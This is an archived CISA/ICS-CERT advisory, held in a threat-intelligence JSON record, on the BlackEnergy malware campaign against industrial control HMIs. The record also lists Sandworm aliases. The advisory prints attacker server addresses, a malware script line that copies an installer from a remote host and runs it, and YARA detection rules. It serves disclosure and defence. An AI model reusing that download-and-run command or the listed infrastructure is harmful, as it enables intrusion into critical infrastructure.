{ "id": "8f3ee82b-a0ee-4344-b215-d14a58f3e8ea", "created_at": "2026-04-06T00:21:15.482422Z", "updated_at": "2026-04-10T13:12:57.205008Z", "deleted_at": null, "sha1_hash": "add962e0d20dcb97657f52750d13c42dbd884fb4", "title": "Ongoing Sophisticated Malware Campaign Compromising ICS (Update E) | CISA", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 88164, "plain_text": "Ongoing Sophisticated Malware Campaign Compromising ICS\r\n(Update E) | CISA\r\nPublished: 2021-07-22 · Archived: 2026-04-05 17:20:29 UTC\r\nDescription\r\nThis alert update is a follow-up to the updated NCCIC/ICS-CERT Alert titled ICS-ALERT-14-281-01D Ongoing\r\nSophisticated Malware Campaign Compromising ICS that was published February 2, 2016, on the ICS-CERT web\r\nsite.\r\nUpdated July 20, 2021: The U.S. Government attributes this activity to Russian nation-state cyber actors. Analysis\r\nindicates that this campaign has been ongoing since at least 2011 and was conducted by Russian nation-state\r\ncyber actors. For more information on Russian malicious cyber activity, refer to us-cert.cisa.gov/Russia.\r\nSUMMARY\r\nThis alert update is a follow-up to the updated NCCIC/ICS-CERT Alert titled ICS-ALERT-14-281-01D Ongoing\r\nSophisticated Malware Campaign Compromising ICS that was published February 2, 2016, on the ICS-CERT web\r\nsite.\r\nICS-CERT has identified a sophisticated malware campaign that has compromised numerous industrial control\r\nsystems (ICSs) environments using a variant of the BlackEnergy malware. Analysis indicates that this campaign\r\nhas been ongoing since at least 2011. Multiple companies working with ICS-CERT have identified the malware on\r\nInternet-connected human-machine interfaces (HMIs).\r\nRecent open-source reports have circulated alleging that a December 23, 2015, power outage in Ukraine was\r\ncaused by BlackEnergy Malware. ICS-CERT and US-CERT are working with the Ukrainian CERT and our\r\ninternational partners to analyze the malware and can confirm that a BlackEnergy 3 variant was present in the\r\nsystem. Based on the technical artifacts ICS-CERT and US-CERT have been provided, we cannot confirm a\r\ncausal link between the power outage with the presence of the malware. However, we continue to support CERT-UA on this issue. The YARA signature included with the original posting of this alert has been shown to identify a\r\nmajority of the samples seen as of this update and continues to be the best method for detecting BlackEnergy\r\ninfections.\r\nWhile there are many open source reports of BE3, this is the first opportunity ICS-CERT has been able to provide\r\nresults of malware analysis. In a departure from the ICS product vulnerabilities used to deliver the BE2 malware,\r\nin this case the infection vector appears to have been spear phishing via a malicious Microsoft Office (MS Word)\r\nattachment. ICS-CERT and US-CERT analysis and support are ongoing, and additional technical analysis will be\r\nmade available on the US-CERT Secure Portal.\r\nICS-CERT originally published information and technical indicators about this campaign in a TLP Amber alert\r\n(ICS-ALERT-14-281-01P) that was released to the US-CERT secure portalICS-CERT encourages US asset\r\nhttps://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B\r\nPage 1 of 9\n\nowners and operators to join the control systems compartment of the US-CERT secure portal. To request access to\r\nthe secure portal send your name, email address, and company affiliation to ics-cert@hq.dhs.gov. on October 8,\r\n2014, and updated on December 10, 2014. US critical infrastructure asset owners and operators can request access\r\nto this information by emailing ics-cert@hq.dhs.gov .\r\nDETAILS\r\nICS-CERT has determined that users of HMI products from various vendors have been targeted in this campaign,\r\nincluding GE Cimplicity, Advantech/Broadwin WebAccess, and Siemens WinCC. It is currently unknown whether\r\nother vendor’s products have also been targeted. ICS‑CERT is working with the involved vendors to evaluate this\r\nactivity and also notify their users of the linkages to this campaign.\r\nAt this time, ICS-CERT has not identified any attempts to damage, modify, or otherwise disrupt the victim\r\nsystems’ control processes. ICS-CERT has not been able to verify if the intruders expanded access beyond the\r\ncompromised HMI into the remainder of the underlying control system. However, typical malware deployments\r\nhave included modules that search out any network-connected file shares and removable media for additional\r\nlateral movement within the affected environment. The malware is highly modular and not all functionality is\r\ndeployed to all victims.\r\nIn addition, public reportsSandworm to Blacken: The SCADA Connection, http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/ web site last accessed October 28, 2014.\r\nSandworm Team – Targeting SCADA Systems, http://www.isightpartners.com/tag/sandworm-team/ web site last\r\naccessed October 28, 2014. reference a BlackEnergy-based campaign against a variety of overseas targets\r\nleveraging vulnerability CVE-2014-4114NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4114,\r\nweb site last accessed October 28, 2014. (affecting Microsoft Windows and Windows Server 2008 and 2012).\r\nICS-CERT has not observed the use of this vulnerability to target control system environments. However, analysis\r\nof the technical findings in the two report shows linkages in the shared command and control infrastructure\r\nbetween the campaigns, suggesting both are part of a broader campaign by the same threat actor.\r\nICS-CERT strongly encourages asset owners and operators to look for signs of compromise within their control\r\nsystems environments. Any positive or suspected findings should be immediately reported to ICS-CERT for\r\nfurther analysis and correlation.\r\nCIMPLICITY\r\nICS-CERT analysis has identified the probable initial infection vector for systems running GE’s Cimplicity HMI\r\nwith a direct connection to the Internet. Analysis of victim system artifacts has determined that the actors have\r\nbeen exploiting a vulnerability in GE’s Cimplicity HMI product since at least January 2012. The vulnerability,\r\nCVE-2014-0751, was published in ICS‑CERT advisory ICSA-14-023-01 on January 23, 2014. Guidance for\r\nremediation was published to the GE IP portal in December 2013.GE Intelligent Platforms, http://support.ge-ip.com/support/index?page=kbchannel. web site last accessed October 28, 2014. GE has also released a statement\r\nabout this campaign on the GE security web site.GE, http://www.ge.com/security web site last accessed October\r\n28, 2014.\r\nhttps://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B\r\nPage 2 of 9\n\nUsing this vulnerability, attackers were able to have the HMI server execute a malicious .cim file [Cimplicity\r\nscreen file] hosted on an attacker-controlled server.\r\n \r\nDate                       Request Type         Requestor IP         Screen Served\r\n1/17/2012 7:16           Start                   \u003cattackerIP\u003e        //212.124.110.146/testshare/payload.cim\r\n9/9/2013 1:49             Start                   \u003cattackerIP\u003e       //46.165.250.32/incoming/devlist.cim\r\n9/10/2014 3:59           Start                   \u003cattackerIP\u003e      \\\\94.185.85.122\\public\\config.bak\r\nFigure 1. Log entries showing execution of remote .cim file.\r\nICS-CERT has analyzed two different .cim files used in this campaign: devlist.cim and config.bak. Both files use\r\nscripts to ultimately install the BlackEnergy malware.\r\ndevlist.cim: This file uses an embedded script that is executed as soon as the file is opened using the Screen\r\nOpen event. The obfuscated script downloads the file “newsfeed.xml” from the same remote server, which\r\nit saves in the Cimplicity directory using the name \u003c41 character string\u003e.wsf. The name is randomly\r\ngenerated using upper and lower case letters, numbers, and hyphens. The .wsf script is then executed using\r\nthe Windows command-based script host (cscript.exe). The new script downloads the file “category.xml,”\r\nwhich it saves in the Cimplicity directory using the name “CimWrapPNPS.exe.” CimWrapPNPS.exe is a\r\nBlackEnergy installer that deletes itself once the malware is installed.\r\nconfig.bak: This file uses a script that is executed when the file is opened using the OnOpenExecCommand\r\nevent. The script downloads a BlackEnergy installer from a remote server, names it “CimCMSafegs.exe,”\r\ncopies it into the Cimplicity directory, and then executes it. The CimCMSafegs.exe file is a BlackEnergy\r\ninstaller that deletes itself after the malware is installed.\r\n \r\ncmd.exe /c “copy \\\\94[dot]185[dot]85[dot]122\\public\\default.txt “%CIMPATH%\\CimCMSafegs.exe” \u0026\u0026\r\nstart “WOW64” “%CIMPATH”\\CimCMSafegs.exe”\r\nFigure 2. Script executed by malicious config.bak file.\r\nAnalysis suggests that the actors likely used automated tools to discover and compromise vulnerable systems.\r\nICS-CERT is concerned that any companies that have been running Cimplicity since 2012 with their HMI directly\r\nconnected to the Internet could be infected with BlackEnergy malware. ICS-CERT strongly recommends that\r\ncompanies use the indicators and Yara signature in this alert to check their systems. In addition, we recommend\r\nthat all Cimplicity users review ICS-CERT advisory ICSA-14-023-01 and apply the recommended mitigations.\r\nWINCC\r\nhttps://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B\r\nPage 3 of 9\n\nWhile ICS-CERT lacks definitive information on how WinCC systems are being compromised by BlackEnergy,\r\nthere are indications that one of the vulnerabilities fixed with the latest update for SIMATIC WinCC may have\r\nbeen exploited by the BlackEnergy malware.See “Nov 21, 2014 (second publication) Siemens Industrial Security\r\nWebsite: Update on ICS-CERT Alert on malware targeting SIMATIC WinCC”\r\n(http://www.industry.siemens.com/topics/global/en/industrial-security/news-alerts/Pages/alerts.aspx) ICS-CERT\r\nstrongly encourages users of WinCC, TIA Portal, and PCS7 to update their software to the most recent version as\r\nsoon as possible. Please see Siemens Security Advisory SSA-134508 and and ICS‑CERT advisory ICSA-14-\r\n329-02D for additional details.\r\nADVANTECH/BROADWIN WEBACCESS\r\nA number of the victims associated with this campaign were running the Advantech/BroadWin WebAccess\r\nsoftware with a direct Internet connection. We have not yet identified the initial infection vector for victims\r\nrunning this platform but believe it is being targeted.\r\nDETECTION\r\nYARA SIGNATURE\r\nICS-CERT has published instruction for how to use the YARA signature for typical information technology\r\nenvironments. ICS-CERT recommends a phased approach to utilize this YARA signature in an industrial control\r\nsystems (ICSs) environment. Test the use of the signature in the test/quality assurance/development ICS\r\nenvironment if one exists. If not, deploy the signature against backup or alternate systems in the top end of the\r\nICS environment; this signature will not be usable on the majority of field devices.\r\n--------- Begin Update E Part 1 of 1 --------\r\nICS-CERT has produced a YARA signature to aid in identifying if the malware files are present on a given system.\r\nThis signature is provided “as is” and has not been fully tested for all variations or environments. Any positive or\r\nsuspected findings should be immediately reported to ICS‑CERT for further analysis and correlation. The YARA\r\nsignature is available at:\r\nhttps://us-cert.gov/sites/default/files/file_attach/ICS-ALERT-14-281-01E.yara\r\nYARA is a pattern-matching tool used to by computer security researchers and companies to help identify\r\nmalware. You can find usage help and download links on the main YARA page at  http://plusvic.github.io/yara/ .\r\nFor use on a Windows machine, you can download the precompiled binaries at:\r\nhttps://github.com/plusvic/yara/releases\r\nLook for “Windows binaries can be found here.” For security purposes, please validate the downloaded YARA\r\nbinaries by comparing the hash of your downloaded binary with the hashes below:\r\nYARA version 3.4.0 32-bit\r\nyara32.exe:\r\nhttps://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B\r\nPage 4 of 9\n\nMD5 - 569ba3971c5f2d5d4a25f2528ee3afb6\r\nSHA256 - e9bfb0389c9c1638dfe683acb5a2fe6c407cb650b48efdc9c17f5deaffe5b360\r\nyarac32.exe:\r\nMD5 - 0d9287bd49a1e1887dcfe26330663c25\r\nSHA256 - 9f107dda72f95ad721cf12ab9c5621d8e57160cce7baf3f42cb751f98dfaf3ce\r\nYARA version 3.4.0 64-bit\r\nyara64.exe:\r\nMD5 - 5a10f9e4f959d4dc47c96548804ff3c4\r\nSHA256 - 427b46907aba3f1ce7dd8529605c1f94a65c8b90020f5cd1d76a5fbc7fc39993\r\nyarac64.exe:\r\nMD5 - 1f248ec809cc9ed89646e89a7b97a806\r\nSHA256 - 92d04ea1b02320737bd9e2f40ab6cbf0f9646bf8ed63a5262ed989cd43a852fb\r\nOnce downloaded, extract the zip archive to the computer where you need to run the signatures and copy the ICS-CERT YARA rule into the same folder. For a comprehensive search (which will take a number of hours,\r\ndepending on the system), use the following command:\r\nyara32.exe -r -s ICS-ALERT-14-281-01E.yara C:  \u003e\u003e yara_results.txt\r\nFor a quicker search, use the following:\r\n(for Windows Vista and later)  \r\nyara32.exe -r -s ICS-ALERT-14-281-01E.yara C:\\Windows \u003e\u003e yara_results.txt \r\nyara32.exe -r -s ICS-ALERT-14-281-01E.yara C:\\Users \u003e\u003e yara_results.txt \r\n(for Windows XP or earlier) \r\nyara32.exe -r -s ICS-ALERT-14-281-01E.yara C:\\Windows \u003e\u003e yara_results.txt \r\nyara32.exe -r -s ICS-ALERT-14-281-01E.yara \"C:\\Documents and Settings\" \u003e\u003e yara_results.txt \r\nThese commands will create a text file named “Yara_results.txt” in the same folder as the rule and YARA\r\nexecutable. If the search returns hits, you can send this file to ICS-CERT, and ICS‑CERT will verify if your\r\nsystem is compromised by BlackEnergy.\r\nThis updated YARA signature reflects current ICS-CERT efforts into the new BlackEnergy Malware. Please use\r\ncaution before implementing this signature in sensitive network environments. The signature may not detect all\r\nhttps://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B\r\nPage 5 of 9\n\nversions of BlackEnergy found in the “wild”. If there are any questions or concerns, please contact ICS-CERT for\r\nassistance.\r\n// detect common properties of the BE2 and BE3 loader\r\nrule BlackEnergy\r\n{\r\n    strings:\r\n        $hc1 = {68 97 04 81 1D 6A 01}\r\n        $hc2 = {68 A8 06 B0 3B 6A 02}\r\n        $hc3 = {68 14 06 F5 33 6A 01}\r\n        $hc4 = {68 AF 02 91 AB 6A 01}\r\n        $hc5 = {68 8A 86 39 56 6A 02}\r\n        $hc6 = {68 19 2B 90 95 6A 01}\r\n        $hc7 = {(68 | B?) 11 05 90 23}\r\n        $hc8 = {(68 | B?) EB 05 4A 2F}\r\n        $hc9 = {(68 | B?) B7 05 57 2A}\r\n    condition:\r\n        2 of ($hc*)\r\n}\r\n// detect BE3 variants that are not caught by the general BlackEnergy rule\r\nrule BlackEnergy3\r\n{\r\n    strings:\r\n        $a1 = \"MCSF_Config\" ascii\r\n        $a2 = \"NTUSER.LOG\" ascii\r\n        $a3 = \"ldplg\" ascii\r\n        $a4 = \"unlplg\" ascii\r\n        $a5 = \"getp\" ascii\r\nhttps://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B\r\nPage 6 of 9\n\n$a6 = \"getpd\" ascii\r\n        $a7 = \"CSTR\" ascii\r\n        $a8 = \"FONTCACHE.DAT\" ascii\r\n    condition:\r\n        4 of them\r\n}\r\n// detect both packed and unpacked variants of the BE2 driver\r\nrule BlackEnergy2_Driver\r\n{\r\n    strings:\r\n        $a1 = {7E 4B 54 1A}\r\n        $a2 = {E0 3C 96 A2}\r\n        $a3 = \"IofCompleteRequest\" ascii\r\n        $b1 = {31 A1 44 BC}\r\n        $b2 = \"IoAttachDeviceToDeviceStack\" ascii\r\n        $b3 = \"KeInsertQueueDpc\" ascii\r\n        $c1 = {A3 41 FD 66}\r\n        $c2 = {61 1E 4E F8}\r\n        $c3 = \"PsCreateSystemThread\" ascii\r\n    condition:\r\n        all of ($a*) and 3 of ($b*, $c*)\r\n}\r\n// detect BE2 variants, typically plugins or loaders containing plugins\r\nrule BlackEnergy2\r\n{\r\n    strings:\r\nhttps://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B\r\nPage 7 of 9\n\n$ex1 = \"DispatchCommand\" ascii\r\n        $ex2 = \"DispatchEvent\" ascii\r\n        $a1 = {68 A1 B0 5C 72}\r\n        $a2 = {68 6B 43 59 4E}\r\n        $a3 = {68 E6 4B 59 4E}\r\n    condition:\r\n        all of ($ex*) and 3 of ($a*)\r\n}\r\n--------- End Update E Part 1 of 1 --------\r\nMITIGATIONS\r\nICS-CERT has published a TLP Amber version of this alert containing additional information about the malware,\r\nplug-ins, and indicators to the secure portal. ICS-CERT strongly encourages asset owners and operators to use\r\nthese indicators to look for signs of compromise within their control systems environments. Asset owners and\r\noperators can request access to this information by emailing ics-cert@hq.dhs.gov .\r\nAny positive or suspected findings should be immediately reported to ICS-CERT for further analysis and\r\ncorrelation.\r\nICS-CERT strongly encourages taking immediate defensive action to secure ICS systems using defense-in-depth\r\nprinciples.CSSP Recommended Practices, https://ics-cert.us-cert.gov/Recommended-Practices, web site last\r\naccessed October 28, 2014. Asset owners should not assume that their control systems are deployed securely or\r\nthat they are not operating with an Internet accessible configuration. Instead, asset owners should thoroughly audit\r\ntheir networks for Internet facing devices, weak authentication methods, and component vulnerabilities. Control\r\nsystems often have Internet accessible devices installed without the owner’s knowledge, putting those systems at\r\nincreased risk of attack.\r\nICS-CERT recommends that users take defensive measures to minimize the risk of exploitation due to this\r\nunsecure device configuration of these vulnerabilities. Specifically, users should:\r\nMinimize network exposure for all control system devices. Control system devices should not directly face\r\nthe Internet.\r\nLocate control system networks and devices behind firewalls, and isolate them from the business network.\r\nIf remote access is required, employ secure methods, such as Virtual Private Networks (VPNs),\r\nrecognizing that VPN is only as secure as the connected devices.\r\nRemove, disable, or rename any default system accounts wherever possible.\r\nApply patches in the ICS environment, when possible to mitigate known vulnerabilities.\r\nImplement policies requiring the use of strong passwords.\r\nhttps://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B\r\nPage 8 of 9\n\nMonitor the creation of administrator level accounts by third-party vendors.\r\nICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to taking defensive\r\nmeasures.\r\nICS-CERT also provides a recommended practices section for control systems on the ICS-CERT web site\r\n(http://ics-cert.us-cert.gov). Several recommended practices are available for reading or download, including\r\nImproving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\r\nOrganizations that observe any suspected malicious activity should follow their established internal procedures\r\nand report their findings to ICS-CERT for tracking and correlation against other incidents.\r\nMitigations\r\nSource: https://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B\r\nhttps://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B" ], "report_names": [ "ICS-ALERT-14-281-01B" ], "threat_actors": [ { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7bd810cb-d674-4763-86eb-2cc182d24ea0", "created_at": "2022-10-25T16:07:24.1537Z", "updated_at": "2026-04-10T02:00:04.883793Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "APT 44", "ATK 14", "BE2", "Blue Echidna", "CTG-7263", "FROZENBARENTS", "G0034", "Grey Tornado", "IRIDIUM", "Iron Viking", "Quedagh", "Razing Ursa", "Sandworm", "Sandworm Team", "Seashell Blizzard", "TEMP.Noble", "UAC-0082", "UAC-0113", "UAC-0125", "UAC-0133", "Voodoo Bear" ], "source_name": "ETDA:Sandworm Team", "tools": [ "AWFULSHRED", "ArguePatch", "BIASBOAT", "Black Energy", "BlackEnergy", "CaddyWiper", "Colibri Loader", "Cyclops Blink", "CyclopsBlink", "DCRat", "DarkCrystal RAT", "Fobushell", "GOSSIPFLOW", "Gcat", "IcyWell", "Industroyer2", "JaguarBlade", "JuicyPotato", "Kapeka", "KillDisk.NCX", "LOADGRIP", "LOLBAS", "LOLBins", "Living off the Land", "ORCSHRED", "P.A.S.", "PassKillDisk", "Pitvotnacci", "PsList", "QUEUESEED", "RansomBoggs", "RottenPotato", "SOLOSHRED", "SwiftSlicer", "VPNFilter", "Warzone", "Warzone RAT", "Weevly" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434875, "ts_updated_at": 1775826777, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/add962e0d20dcb97657f52750d13c42dbd884fb4.pdf", "text": "https://archive.orkl.eu/add962e0d20dcb97657f52750d13c42dbd884fb4.txt", "img": "https://archive.orkl.eu/add962e0d20dcb97657f52750d13c42dbd884fb4.jpg" } }